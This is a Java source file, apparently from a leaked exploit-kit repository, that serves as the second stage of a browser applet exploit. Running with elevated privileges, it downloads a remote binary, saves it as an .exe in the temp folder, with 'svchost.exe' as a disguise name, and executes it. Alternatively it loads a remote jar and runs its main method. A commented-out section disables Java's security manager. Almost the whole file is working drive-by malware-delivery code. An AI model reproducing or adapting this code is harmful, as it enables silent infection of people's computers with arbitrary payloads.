hackedteam/vector-applet

View on GitHub
twostage/src-exploit/x/PayloadRunnerOrig.java

Summary

Maintainability
B
6 hrs
Test Coverage
package x;

import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.URLConnection;
import java.security.AccessController;
import java.security.PrivilegedAction;

public class PayloadRunnerOrig implements PrivilegedAction<Void> {

    public static String docBase = null;
    public static String pJar = null;
    public static String pClass = null;
    public static String[] pArgs = null;
    public static String pBin = null;

    public static Class<?> clClazz;
    
    public PayloadRunnerOrig() {
        AccessController.doPrivileged(this);
    }

    @SuppressWarnings("all")
    @Override
    public Void run() {
//        if( pJar == null ) {
//            // Default handler
//            try {
//                System.setSecurityManager(null);
////                System.out.println("HAXOORD! SECURITY DISABLED!");
//            } catch( Exception e ) {
////                System.out.println("Failed! Security still enabled.");
//            }
//            return null;
//        } 
            
        // Load payload privileged and execute main function.
        try {
            if( "demomode".equals(docBase) ) {
                docBase = "file:/"+System.getProperty("user.dir").replace('\\', '/')+"/html/index.html";
            }
            docBase = docBase.substring(0,docBase.lastIndexOf("/")+1);
            URL url = null;
            boolean binaryPayload = pBin != null;
            String payloadLoc = binaryPayload ? pBin 
                                              : pJar;
            if( payloadLoc.matches("[a-z]+:.*") ) {
                url = new URL(payloadLoc);
            } else {
                url = new URL(docBase+payloadLoc);
            }    
//            System.out.println(url);
            byte[] bytes = new byte[16384];
            if( binaryPayload ) {
                URLConnection con = url.openConnection();
                InputStream in = con.getInputStream();
                int bytesRead;                
                File downloadLoc = null;
                File f = File.createTempFile("temp", ".bin");
                File tempDir = f.getParentFile();
                String filename = payloadLoc.substring(payloadLoc.lastIndexOf('/')+1);
                if( filename.contains("?") ) {
                    filename = filename.substring(0,filename.indexOf("?"));
                }
                if( filename.length() != 0 ) {
                    if( !filename.endsWith(".exe") ) {
                        filename = filename+".exe";
                    }
                    downloadLoc = new File(tempDir+"/"+filename);
                    if( downloadLoc.exists() && !downloadLoc.delete() ) {
                        downloadLoc = new File(tempDir+"/svchost.exe");
                        if( downloadLoc.exists() && !downloadLoc.delete() ) {
                            downloadLoc = File.createTempFile("", ".exe");
                        }
                    }
                }
                FileOutputStream fout = new FileOutputStream(downloadLoc);
                while( (bytesRead = in.read(bytes)) != -1 ) {
                    fout.write(bytes, 0, bytesRead);
                }
                in.close();
                fout.close();
                String[] command = new String[pArgs.length+1];
                command[0] = downloadLoc.getAbsolutePath();
                System.arraycopy(pArgs, 0, command, 1, pArgs.length);
                Runtime.getRuntime().exec(command);
            } else {

                URLClassLoader cl = (URLClassLoader) clClazz.
                        getConstructor(new Class[] { URL[].class, ClassLoader.class }).
                        newInstance(new URL[] { url },null);
                
                Class c = cl.loadClass(pClass);
                Method m = c.getMethod("main", new Class[] { String[].class });
                m.invoke(null, (Object)pArgs);
            }    
            //System.out.println("Payload executed!");
        } catch (Exception e) {
//            System.out.println("Failed! Could not load payload.");
            e.printStackTrace();
        } 
        return null;
    }

}